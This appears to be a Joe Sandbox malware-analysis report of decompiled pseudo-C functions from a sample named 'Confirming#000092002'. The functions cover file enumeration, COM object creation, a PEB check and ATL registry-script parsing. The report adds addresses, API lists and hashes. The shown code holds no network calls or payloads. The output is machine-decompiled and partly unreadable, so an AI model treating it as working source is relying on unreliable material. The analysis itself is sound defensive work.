											_t144 =  *((intOrPtr*)(_t97 + 1));
											__eflags = _t144;
											if(_t144 == 0) {
												goto L35;
											} else {
												__eflags = _t144 - 0x2e;
												if(_t144 != 0x2e) {
													goto L34;
												} else {
													__eflags =  *((intOrPtr*)(_t97 + 2)) - _t127;
													if( *((intOrPtr*)(_t97 + 2)) == _t127) {
														goto L35;
													} else {
														goto L34;
													}
												}
											}
										}
										L43:
										FindClose(_t166);
										goto L44;
										L35:
										__eflags = _v616 - _t127;
										if(_v616 != _t127) {
											E00EA8B82(_v628);
											_pop(_t144);
										}
										__eflags = FindNextFileW(_t166,  &_v604);
									} while (__eflags != 0);
									_t106 = _v612;
									_t149 = _v644;
									_t156 =  *_t106;
									_t109 =  *((intOrPtr*)(_t106 + 4)) -  *_t106 >> 2;
									__eflags = _t149 - _t109;
									if(_t149 != _t109) {
										E00EACB90(_t156, _t156 + _t149 * 4, _t109 - _t149, 4, E00EA9E84);
									}
									goto L43;
								} else {
									_push(_v612);
									_t127 = E00EAA22B( &_v604, _t166, _t160, _t127, _t127);
								}
								L44:
								__eflags = _v652;
								_pop(_t165);
								if(_v652 != 0) {
									E00EA8B82(_v664);
								}
								_t100 = _t127;
							} else {
								__eflags = _t138 - _t160 + 1;
								if(_t138 == _t160 + 1) {
									_t77 = _v605;
									goto L23;
								} else {
									_push(_t156);
									_t100 = E00EAA22B(_t138, _t165, _t160, 0, 0);
								}
							}
							_pop(_t161);
							__eflags = _v12 ^ _t170;
							_pop(_t128);
							return E00EA403C(_t100, _t128, _v12 ^ _t170, _t156, _t161, _t165);
						} else {
							goto L7;
						}
					}
				} else {
					_t121 = 0xc;
					L4:
					return _t121;
				}
			}

0x00eaa230
0x00eaa231
0x00eaa234
0x00eaa234
0x00eaa237
0x00eaa237
0x00eaa239
0x00eaa23a
0x00eaa23f
0x00eaa246
0x00eaa249
0x00eaa24e
0x00eaa257
0x00eaa258
0x00eaa25b
0x00eaa265
0x00eaa269
0x00eaa26b
0x00eaa27f
0x00eaa27f
0x00eaa282
0x00eaa28c
0x00eaa291
0x00eaa294
0x00eaa296
0x00000000
0x00eaa298
0x00eaa298
0x00eaa29d
0x00eaa2a4
0x00eaa2a7
0x00eaa2a9
0x00eaa2ba
0x00eaa2bc
0x00eaa2be
0x00eaa2be
0x00eaa2be
0x00eaa2ab
0x00eaa2ac
0x00eaa2b1
0x00eaa2b4
0x00eaa2c3
0x00eaa2c9
0x00000000
0x00eaa2cc
0x00eaa26d
0x00eaa26d
0x00eaa273
0x00eaa278
0x00eaa27b
0x00eaa27d
0x00eaa2cf
0x00eaa2d1
0x00eaa2d2
0x00eaa2d3
0x00eaa2d4
0x00eaa2d5
0x00eaa2d6
0x00eaa2db
0x00eaa2df
0x00eaa2e1
0x00eaa2e7
0x00eaa2ee
0x00eaa2f1
0x00eaa2f4
0x00eaa2f7
0x00eaa2f8
0x00eaa2f9
0x00eaa2fc
0x00eaa302
0x00eaa304
0x00eaa306
0x00eaa306
0x00eaa308
0x00eaa30a
0x00000000
0x00000000
0x00eaa30c
0x00eaa30e
0x00eaa310
0x00eaa312
0x00eaa31d
0x00eaa31f
0x00eaa321
0x00000000
0x00000000
0x00eaa321
0x00eaa312
0x00000000
0x00eaa30e
0x00eaa323
0x00eaa323
0x00eaa329
0x00eaa32b
0x00eaa331
0x00eaa333
0x00eaa355
0x00eaa355
0x00eaa357
0x00eaa359
0x00eaa365
0x00eaa365
0x00eaa35b
0x00eaa35b
0x00eaa35d
0x00000000
0x00eaa35f
0x00eaa35f
0x00eaa361
0x00eaa363
0x00000000
0x00000000
0x00eaa363
0x00eaa35d
0x00eaa36d
0x00eaa375
0x00eaa37b
0x00eaa37c
0x00eaa37e
0x00eaa386
0x00eaa38c
0x00eaa392
0x00eaa398
0x00eaa3ac
0x00eaa3b1
0x00eaa3bc
0x00eaa3d2
0x00eaa3d4
0x00eaa3d7
0x00eaa3fa
0x00eaa3fa
0x00eaa3fc
0x00eaa3ff
0x00eaa405
0x00eaa405
0x00eaa40b
0x00eaa411
0x00eaa417
0x00eaa41d
0x00eaa423
0x00eaa444
0x00eaa449
0x00eaa44e
0x00eaa452
0x00eaa458
0x00eaa45b
0x00eaa46e
0x00eaa46e
0x00eaa47c
0x00eaa481
0x00eaa484
0x00eaa48a
0x00eaa48c
0x00eaa4ea
0x00eaa4f0
0x00eaa4f8
0x00eaa4fd
0x00eaa503
0x00eaa504
0x00000000
0x00000000
0x00000000
0x00eaa45d
0x00eaa45d
0x00eaa460
0x00eaa462
0x00000000
0x00eaa464
0x00eaa464
0x00eaa467
0x00000000
0x00eaa469
0x00eaa469
0x00eaa46c
0x00000000
0x00000000
0x00000000
0x00000000
0x00eaa46c
0x00eaa467
0x00eaa462
0x00eaa506
0x00eaa507
0x00000000
0x00eaa48e
0x00eaa48e
0x00eaa494
0x00eaa49c
0x00eaa4a1
0x00eaa4a1
0x00eaa4b0
0x00eaa4b0
0x00eaa4b8
0x00eaa4be
0x00eaa4c4
0x00eaa4cb
0x00eaa4ce
0x00eaa4d0
0x00eaa4e0
0x00eaa4e5
0x00000000
0x00eaa3d9
0x00eaa3d9
0x00eaa3ea
0x00eaa3ea
0x00eaa50d
0x00eaa50d
0x00eaa514
0x00eaa515
0x00eaa51d
0x00eaa522
0x00eaa523
0x00eaa335
0x00eaa338
0x00eaa33a
0x00eaa34f
0x00000000
0x00eaa33c
0x00eaa33c
0x00eaa342
0x00eaa347
0x00eaa33a
0x00eaa528
0x00eaa529
0x00eaa52b
0x00eaa532
0x00000000
0x00000000
0x00000000
0x00eaa27d
0x00eaa250
0x00eaa252
0x00eaa253
0x00eaa255
0x00eaa255

Memory Dump Source

Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ecb4f265c08ea5114af782c8699acb492d2d9329690a97b514e103d075b526c
Instruction ID: fb0d7ce8197b584ec33ee551b8997117adda4e764e4fbbb7bb0990dbe1c6eb78
Opcode Fuzzy Hash: 8ecb4f265c08ea5114af782c8699acb492d2d9329690a97b514e103d075b526c
Instruction Fuzzy Hash: E141A5758042189EDF10DF69CC89AEEB7B9AF4A304F1852E9E41DA7211D7316E84CF20

Uniqueness

Uniqueness Score: -1.00%

Function 00EA14A2 Relevance: 1.5, APIs: 1, Instructions: 35
comCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00EA14A2(void* __ecx, intOrPtr* _a4) {
				void* _t4;
				intOrPtr* _t8;
				intOrPtr* _t11;
				intOrPtr* _t14;
				void* _t17;

				_t8 = _a4;
				if(_t8 != 0) {
					_t17 = 0;
					_t14 = __ecx + 0x28;
					if( *_t14 != 0) {
						L4:
						 *_t8 =  *_t14;
						_t11 =  *_t14;
						 *((intOrPtr*)( *_t11 + 4))(_t11);
						L5:
						return _t17;
					}
					__imp__CoCreateInstance(0xeb12d0, 0, 1, 0xeb6250, _t14);
					_t17 = _t4;
					if(_t17 < 0) {
						goto L5;
					}
					goto L4;
				}
				return 0x80004003;
			}

0x00ea14a6
0x00ea14ab
0x00ea14b6
0x00ea14b8
0x00ea14bd
0x00ea14d9
0x00ea14db
0x00ea14dd
0x00ea14e2
0x00ea14e5
0x00000000
0x00ea14e8
0x00ea14cd
0x00ea14d3
0x00ea14d7
0x00000000
0x00000000
0x00000000
0x00ea14d7
0x00000000

APIs

CoCreateInstance.OLE32(00EB12D0,00000000,00000001,00EB6250,?), ref: 00EA14CD

Memory Dump Source

Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: 8ad7df9bf591dd02174de7e05c55aa3de941ab34de8749d4a6eca525b43dd3ce
Instruction ID: 8888d980e747a40595da6f123e2fe4e8c86c5f270237c7ab01eacfe8541525cc
Opcode Fuzzy Hash: 8ad7df9bf591dd02174de7e05c55aa3de941ab34de8749d4a6eca525b43dd3ce
Instruction Fuzzy Hash: 2DF089762043219B87248E4ADC84D87FB6DEF5EB64B104155F905FF250D770AC40C6D4

Uniqueness

Uniqueness Score: -1.00%

Function 00EAB2B8 Relevance: 1.3, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00EAB2B8() {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0xfe2dc0 = _t3;
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}

0x00eab2b8
0x00eab2c0
0x00eab2c8

APIs

GetProcessHeap.KERNEL32 ref: 00EAB2B8

Memory Dump Source

Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: e944909fbf7ad781eda1e4e1f26996a644bf1464f31e68f928f10da238db76f7
Instruction ID: 16b6815d466e0ec8fec3a7e3e8f22409cce16e4dcb55477d9af78590f429fd0c
Opcode Fuzzy Hash: e944909fbf7ad781eda1e4e1f26996a644bf1464f31e68f928f10da238db76f7
Instruction Fuzzy Hash: E8A012302011458F47504F357F05209369CB60019130001949004C4030E72040006601

Uniqueness

Uniqueness Score: -1.00%

Function 00EA9DF6 Relevance: .0, Instructions: 22
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00EA9DF6(void* __ecx) {
				char _v8;
				intOrPtr _t7;
				char _t13;

				_t13 = 0;
				_v8 = 0;
				_t7 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
				_t16 =  *((intOrPtr*)(_t7 + 8));
				if( *((intOrPtr*)(_t7 + 8)) < 0) {
					L2:
					_t13 = 1;
				} else {
					E00EA9841(_t16,  &_v8);
					if(_v8 != 1) {
						goto L2;
					}
				}
				return _t13;
			}

0x00ea9e03
0x00ea9e05
0x00ea9e08
0x00ea9e0b
0x00ea9e0e
0x00ea9e1f
0x00ea9e21
0x00ea9e10
0x00ea9e14
0x00ea9e1d
0x00000000
0x00000000
0x00ea9e1d
0x00ea9e26

Memory Dump Source

Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed9c1925cec1054f47211cdcd88e88786feddc4eef384b275f41e22a3a111c21
Instruction ID: fce567c26f393ead80db1f1fcb9d12603466fdfce443522bfa3ae92e18f851be
Opcode Fuzzy Hash: ed9c1925cec1054f47211cdcd88e88786feddc4eef384b275f41e22a3a111c21
Instruction Fuzzy Hash: 34E0EC72915238EBCB19DB98C944D9AF3ECEB4AB54F155496F501E7212D274EE00C7D0

Uniqueness

Uniqueness Score: -1.00%

Function 00EA29E8 Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 208
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 81%

			E00EA29E8(CHAR* __ebx, CHAR** __ecx, void* __edi, void* __esi, void* __eflags) {
				CHAR** _t42;
				void* _t45;
				CHAR* _t47;
				CHAR* _t48;
				CHAR* _t53;
				CHAR* _t61;
				CHAR* _t62;
				CHAR* _t63;
				CHAR* _t64;
				char _t66;
				CHAR* _t67;
				CHAR* _t68;
				CHAR* _t69;
				CHAR* _t73;
				CHAR* _t74;
				CHAR* _t75;
				CHAR* _t76;
				CHAR* _t77;
				CHAR* _t78;
				CHAR* _t79;
				CHAR* _t84;
				void* _t89;
				CHAR* _t92;
				char _t98;
				CHAR** _t101;
				CHAR* _t103;
				void* _t104;
				void* _t105;

				_t80 = __ebx;
				_push(0x40);
				E00EB0216(0xeb08c4, __ebx, __edi, __esi);
				_t101 = __ecx;
				_t103 =  *(_t104 + 8);
				_t42 =  *(_t104 + 0xc);
				 *(_t104 - 0x4c) = _t42;
				if(_t103 != 0 && _t42 != 0) {
					_t80 = 0;
					 *_t42 = 0;
					_t45 = E00EA74D0(_t103);
					 *((intOrPtr*)(_t104 - 0x44)) = 0;
					_t47 =  <  ? 0x3e8 : _t45 + _t45;
					 *(_t104 - 0x40) = _t47;
					__imp__CoTaskMemAlloc(_t47);
					 *(_t104 - 0x3c) = _t47;
					if(_t47 != 0) {
						 *_t47 = 0;
					}
					 *(_t104 - 4) = _t80;
					if(_t47 != 0) {
						 *_t101 = _t103;
						_t48 = _t80;
						_t84 = _t80;
						_t98 =  *0xfe2df8; // 0x0
						 *((char*)(_t104 - 0x33)) = _t98;
						 *(_t104 - 0x38) = _t48;
						 *(_t104 - 0x32) = _t80;
						 *(_t104 - 0x31) = _t84;
						__eflags =  *_t103 - _t48;
						if( *_t103 == _t48) {
							L45:
							 *(_t104 - 0x3c) = _t80;
							 *( *(_t104 - 0x4c)) =  *(_t104 - 0x3c);
						} else {
							while(1) {
								 *(_t104 - 0x48) = _t48;
								__eflags = _t98 - 1;
								if(_t98 != 1) {
									goto L29;
								}
								__eflags = _t48;
								if(_t48 != 0) {
									L14:
									_t64 =  *_t101;
									__eflags =  *_t64 - 0x27;
									if( *_t64 != 0x27) {
										__eflags = _t84;
										if(_t84 != 0) {
											goto L29;
										} else {
											goto L22;
										}
									} else {
										__eflags = _t84;
										if(_t84 != 0) {
											_t69 = CharNextA(_t64);
											__eflags =  *_t69 - 0x27;
											if( *_t69 == 0x27) {
												_t103 = CharNextA( *_t101);
												 *_t101 = _t103;
												_t73 = E00EA18A6(_t104 - 0x44, _t103, CharNextA(_t103) - _t103);
												__eflags = _t73;
												if(_t73 == 0) {
													goto L5;
												} else {
													goto L29;
												}
											} else {
												 *(_t104 - 0x31) = _t80;
												L22:
												_t66 =  *( *_t101);
												__eflags = _t66 - 0x7b;
												if(_t66 != 0x7b) {
													_t92 =  *(_t104 - 0x48);
													 *(_t104 - 0x38) = _t92;
													__eflags = _t66 - 0x7d;
													if(_t66 != 0x7d) {
														goto L29;
													} else {
														_t67 = _t92 - 1;
														 *(_t104 - 0x38) = _t67;
														__eflags = _t67;
														if(_t67 != 0) {
															goto L29;
														} else {
															__eflags =  *(_t104 - 0x32) - 1;
															if(__eflags != 0) {
																goto L29;
															} else {
																_push(L"\r\n\t}\r\n}\r\n");
																_t68 = E00EA1928(_t80, _t104 - 0x44, _t101, _t103, __eflags);
																__eflags = _t68;
																if(_t68 == 0) {
																	goto L5;
																} else {
																	 *(_t104 - 0x32) = _t80;
																	goto L29;
																}
															}
														}
													}
												} else {
													 *(_t104 - 0x38) =  &(( *(_t104 - 0x38))[1]);
													goto L29;
												}
											}
										} else {
											 *(_t104 - 0x31) = 1;
											goto L29;
										}
									}
								} else {
									_t74 = E00EA772C(_t103, "HKCR");
									__eflags = _t74;
									if(_t74 == 0) {
										L13:
										_t84 =  *(_t104 - 0x31);
										goto L14;
									} else {
										__eflags = _t74 -  *_t101;
										if(__eflags != 0) {
											goto L13;
										} else {
											_t75 = CharNextA( *_t101);
											 *_t101 = _t75;
											_t76 = CharNextA(_t75);
											 *_t101 = _t76;
											_t77 = CharNextA(_t76);
											 *_t101 = _t77;
											_t78 = CharNextA(_t77);
											_push(L"HKCU\r\n{\tSoftware\r\n\t{\r\n\t\tClasses");
											 *_t101 = _t78;
											_t79 = E00EA1928(_t80, _t104 - 0x44, _t101, _t103, __eflags);
											__eflags = _t79;
											if(_t79 == 0) {
												goto L5;
											} else {
												 *(_t104 - 0x32) = 1;
												goto L13;
											}
										}
									}
								}
								goto L46;
								L29:
								_t103 =  *_t101;
								_push(_t103);
								__eflags =  *_t103 - 0x25;
								if( *_t103 != 0x25) {
									L32:
									_t53 = E00EA18A6(_t104 - 0x44, _t103, CharNextA() - _t103);
									__eflags = _t53;
									if(_t53 == 0) {
										goto L5;
									} else {
										goto L33;
									}
								} else {
									_t103 = CharNextA();
									 *_t101 = _t103;
									__eflags =  *_t103 - 0x25;
									if( *_t103 != 0x25) {
										_t103 = E00EA22D6(_t103, 0x25);
										__eflags = _t103;
										if(_t103 == 0) {
											L44:
											_t80 = 0x80020009;
										} else {
											_t89 = _t103 -  *_t101;
											__eflags = _t89 - 0x1f;
											if(_t89 > 0x1f) {
												_t80 = 0x80004005;
											} else {
												E00EA1285(E00EA770F(_t104 - 0x30, 0x20,  *_t101, _t89));
												_t105 = _t105 + 0x14;
												_t61 = E00EA2199(_t101[1], _t104 - 0x30);
												__eflags = _t61;
												if(__eflags == 0) {
													goto L44;
												} else {
													_push(_t61);
													_t62 = E00EA1928(_t80, _t104 - 0x44, _t101, _t103, __eflags);
													__eflags = _t62;
													if(_t62 == 0) {
														goto L5;
													} else {
														_t63 =  *_t101;
														while(1) {
															__eflags = _t63 - _t103;
															if(_t63 == _t103) {
																break;
															}
															_t63 = CharNextA(_t63);
															 *_t101 = _t63;
														}
														L33:
														_t103 = CharNextA( *_t101);
														 *_t101 = _t103;
														__eflags =  *_t103;
														if( *_t103 == 0) {
															goto L45;
														} else {
															_t48 =  *(_t104 - 0x38);
															_t84 =  *(_t104 - 0x31);
															_t98 =  *((intOrPtr*)(_t104 - 0x33));
															continue;
														}
													}
												}
											}
										}
									} else {
										_push(_t103);
										goto L32;
									}
								}
								goto L46;
							}
						}
					} else {
						L5:
						_t80 = 0x8007000e;
					}
					L46:
					__imp__CoTaskMemFree( *(_t104 - 0x3c));
				}
				return E00EB01C5(_t80, _t101, _t103);
			}

0x00ea29e8
0x00ea29e8
0x00ea29ef
0x00ea29f4
0x00ea29f6
0x00ea29f9
0x00ea29fc
0x00ea2a01
0x00ea2a0f
0x00ea2a12
0x00ea2a14
0x00ea2a1b
0x00ea2a27
0x00ea2a2b
0x00ea2a2e
0x00ea2a34
0x00ea2a39
0x00ea2a3b
0x00ea2a3b
0x00ea2a3d
0x00ea2a42
0x00ea2a4e
0x00ea2a50
0x00ea2a52
0x00ea2a54
0x00ea2a5a
0x00ea2a5d
0x00ea2a60
0x00ea2a63
0x00ea2a66
0x00ea2a68
0x00ea2c2b
0x00ea2c31
0x00ea2c34
0x00000000
0x00ea2a6e
0x00ea2a6e
0x00ea2a71
0x00ea2a74
0x00000000
0x00000000
0x00ea2a7a
0x00ea2a7c
0x00ea2ad4
0x00ea2ad4
0x00ea2ad6
0x00ea2ad9
0x00ea2b1f
0x00ea2b21
0x00000000
0x00000000
0x00000000
0x00000000
0x00ea2adb
0x00ea2adb
0x00ea2add
0x00ea2ae6
0x00ea2aec
0x00ea2aef
0x00ea2afe
0x00ea2b01
0x00ea2b10
0x00ea2b15
0x00ea2b17
0x00000000
0x00ea2b1d
0x00000000
0x00ea2b1d
0x00ea2af1
0x00ea2af1
0x00ea2b23
0x00ea2b25
0x00ea2b27
0x00ea2b29
0x00ea2b30
0x00ea2b33
0x00ea2b36
0x00ea2b38
0x00000000
0x00ea2b3a
0x00ea2b3a
0x00ea2b3d
0x00ea2b40
0x00ea2b42
0x00000000
0x00ea2b44
0x00ea2b44
0x00ea2b48
0x00000000
0x00ea2b4a
0x00ea2b4a
0x00ea2b52
0x00ea2b57
0x00ea2b59
0x00000000
0x00ea2b5f
0x00ea2b5f
0x00000000
0x00ea2b5f
0x00ea2b59
0x00ea2b48
0x00ea2b42
0x00ea2b2b
0x00ea2b2b
0x00000000
0x00ea2b2b
0x00ea2b29
0x00ea2adf
0x00ea2adf
0x00000000
0x00ea2adf
0x00ea2add
0x00ea2a7e
0x00ea2a84
0x00ea2a8b
0x00ea2a8d
0x00ea2ad1
0x00ea2ad1
0x00000000
0x00ea2a8f
0x00ea2a8f
0x00ea2a91
0x00000000
0x00ea2a93
0x00ea2a95
0x00ea2a9c
0x00ea2a9e
0x00ea2aa5
0x00ea2aa7
0x00ea2aae
0x00ea2ab0
0x00ea2ab6
0x00ea2abe
0x00ea2ac0
0x00ea2ac5
0x00ea2ac7
0x00000000
0x00ea2acd
0x00ea2acd
0x00000000
0x00ea2acd
0x00ea2ac7
0x00ea2a91
0x00ea2a8d
0x00000000
0x00ea2b62
0x00ea2b62
0x00ea2b64
0x00ea2b65
0x00ea2b68
0x00ea2b7a
0x00ea2b87
0x00ea2b8c
0x00ea2b8e
0x00000000
0x00000000
0x00000000
0x00000000
0x00ea2b6a
0x00ea2b70
0x00ea2b72
0x00ea2b74
0x00ea2b77
0x00ea2bc0
0x00ea2bc2
0x00ea2bc4
0x00ea2c24
0x00ea2c24
0x00ea2bc6
0x00ea2bc8
0x00ea2bca
0x00ea2bcd
0x00ea2c1d
0x00ea2bcf
0x00ea2bde
0x00ea2be9
0x00ea2bed
0x00ea2bf2
0x00ea2bf4
0x00000000
0x00ea2bf6
0x00ea2bf6
0x00ea2bfa
0x00ea2bff
0x00ea2c01
0x00000000
0x00ea2c07
0x00ea2c07
0x00ea2c14
0x00ea2c14
0x00ea2c16
0x00000000
0x00000000
0x00ea2c0c
0x00ea2c12
0x00ea2c12
0x00ea2b94
0x00ea2b9c
0x00ea2b9e
0x00ea2ba0
0x00ea2ba3
0x00000000
0x00ea2ba9
0x00ea2ba9
0x00ea2bac
0x00ea2baf
0x00000000
0x00ea2baf
0x00ea2ba3
0x00ea2c01
0x00ea2bf4
0x00ea2bcd
0x00ea2b79
0x00ea2b79
0x00000000
0x00ea2b79
0x00ea2b77
0x00000000
0x00ea2b68
0x00ea2a6e
0x00ea2a44
0x00ea2a44
0x00ea2a44
0x00ea2a44
0x00ea2c36
0x00ea2c39
0x00ea2c3f
0x00ea2c4d

APIs

__EH_prolog3_GS.LIBCMT ref: 00EA29EF
_strlen.LIBCMT ref: 00EA2A14
CoTaskMemAlloc.OLE32(00000000,00000040,00EA2C84,?,00000000,00000000,?), ref: 00EA2A2E
CharNextA.USER32(?,?,?,00000000), ref: 00EA2A95
CharNextA.USER32(00000000,?,?,?,00000000), ref: 00EA2A9E
CharNextA.USER32(00000000,?,?,?,00000000), ref: 00EA2AA7
CharNextA.USER32(00000000,?,?,?,00000000), ref: 00EA2AB0
CharNextA.USER32(?,?,?,00000000), ref: 00EA2AE6
CharNextA.USER32(?,?,?,00000000), ref: 00EA2AF8
CharNextA.USER32(00000000,?,?,?,00000000), ref: 00EA2B03
CharNextA.USER32(00000000,}},?,?,00000000), ref: 00EA2B6A
CharNextA.USER32(?), ref: 00EA2B7A
CharNextA.USER32(?,?,00000000), ref: 00EA2B96
__cftof.LIBCMT ref: 00EA2BD8
CharNextA.USER32(00000000,00000000,?,?,?,00EA1D41,?,?), ref: 00EA2C0C
CoTaskMemFree.OLE32(?), ref: 00EA2C39

Strings

}}, xrefs: 00EA2B4A
HKCU{Software{Classes, xrefs: 00EA2AB6
HKCR, xrefs: 00EA2A7E

Memory Dump Source

Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd

Similarity

API ID: CharNext$Task$AllocFreeH_prolog3___cftof_strlen
String ID: }}$HKCR$HKCU{Software{Classes
API String ID: 4131663743-1142484189
Opcode ID: 8b1e3869e73bdedc4c5dda15038682b0636333f5293e930e210d924b2d899509
Instruction ID: a5dcc7e95669a6976ed58dc78b3f4c0d13ba8eb0ab2bb1a217d224f7560e1938
Opcode Fuzzy Hash: 8b1e3869e73bdedc4c5dda15038682b0636333f5293e930e210d924b2d899509
Instruction Fuzzy Hash: 9071B170D043469FDB259FA8D8946AEBBB4AF1E314F24215DEA41FB261EB34AC45CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00EA2DA0 Relevance: 31.9, APIs: 14, Strings: 4, Instructions: 438
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 88%

			E00EA2DA0(intOrPtr __ecx, void* __edx, char* _a4, void* _a8, void* _a12, void* _a16) {
				char _v8;
				char _v16;
				signed int _v20;
				char _v280;
				char _v4376;
				intOrPtr _v4380;
				int _v4384;
				void* _v4388;
				signed int _v4392;
				int _v4396;
				signed int _v4400;
				int _v4404;
				void* _v4408;
				signed int _v4412;
				void* _v4416;
				void* _v4420;
				signed int _v4424;
				signed int _v4428;
				signed int _v4432;
				signed int _v4436;
				signed int _v4440;
				void* _v4444;
				char _v4448;
				signed int _v4452;
				signed int _v4456;
				signed int _v4460;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t131;
				signed int _t132;
				void* _t140;
				void* _t143;
				void* _t144;
				void* _t145;
				void* _t146;
				void* _t152;
				void* _t157;
				void* _t159;
				void* _t162;
				void* _t165;
				void* _t167;
				void* _t169;
				void* _t171;
				void* _t172;
				void* _t179;
				void* _t180;
				void* _t190;
				void* _t197;
				void* _t198;
				void* _t199;
				signed int _t225;
				char* _t242;
				void* _t243;
				void* _t245;
				void* _t246;
				void* _t247;
				void* _t248;
				void* _t250;
				signed int _t251;
				void* _t252;

				_t240 = __edx;
				_push(0xffffffff);
				_push(0xeb0906);
				_push( *[fs:0x0]);
				E00EB02C0(0x115c);
				_t131 =  *0xeb9008; // 0x64e1d101
				_t132 = _t131 ^ _t251;
				_v20 = _t132;
				_push(_t132);
				 *[fs:0x0] =  &_v16;
				_v4380 = __ecx;
				_t242 = _a4;
				_v4388 = _a8;
				_t197 = 0;
				_v4400 = 0;
				_v4404 = 0;
				_v4396 = 0;
				_v8 = 0;
				_t245 = E00EA2327(__ecx, _t242);
				if(_t245 < 0) {
					L89:
					 *[fs:0x0] = _v16;
					_pop(_t243);
					_pop(_t246);
					_pop(_t198);
					return E00EA403C(_t245, _t198, _v20 ^ _t251, _t240, _t243, _t246);
				} else {
					while( *_t242 != 0x7d) {
						_v4384 = 1;
						lstrcmpiA(_t242, "Delete");
						asm("sbb esi, esi");
						_t247 = _t245 + 1;
						_v4392 = _t247;
						_t140 = lstrcmpiA(_t242, "ForceRemove");
						__eflags = _t140;
						if(_t140 == 0) {
							L4:
							_t245 = E00EA2327(_v4380, _t242);
							__eflags = _t245;
							if(_t245 < 0) {
								L87:
								if(_t197 != 0) {
									RegCloseKey(_t197);
								}
								goto L89;
							}
							_t248 = 0;
							__eflags = _a12;
							if(_a12 == 0) {
								L15:
								_t143 = lstrcmpiA(_t242, "NoRemove");
								__eflags = _t143;
								if(_t143 != 0) {
									L17:
									_t144 = lstrcmpiA(_t242, "Val");
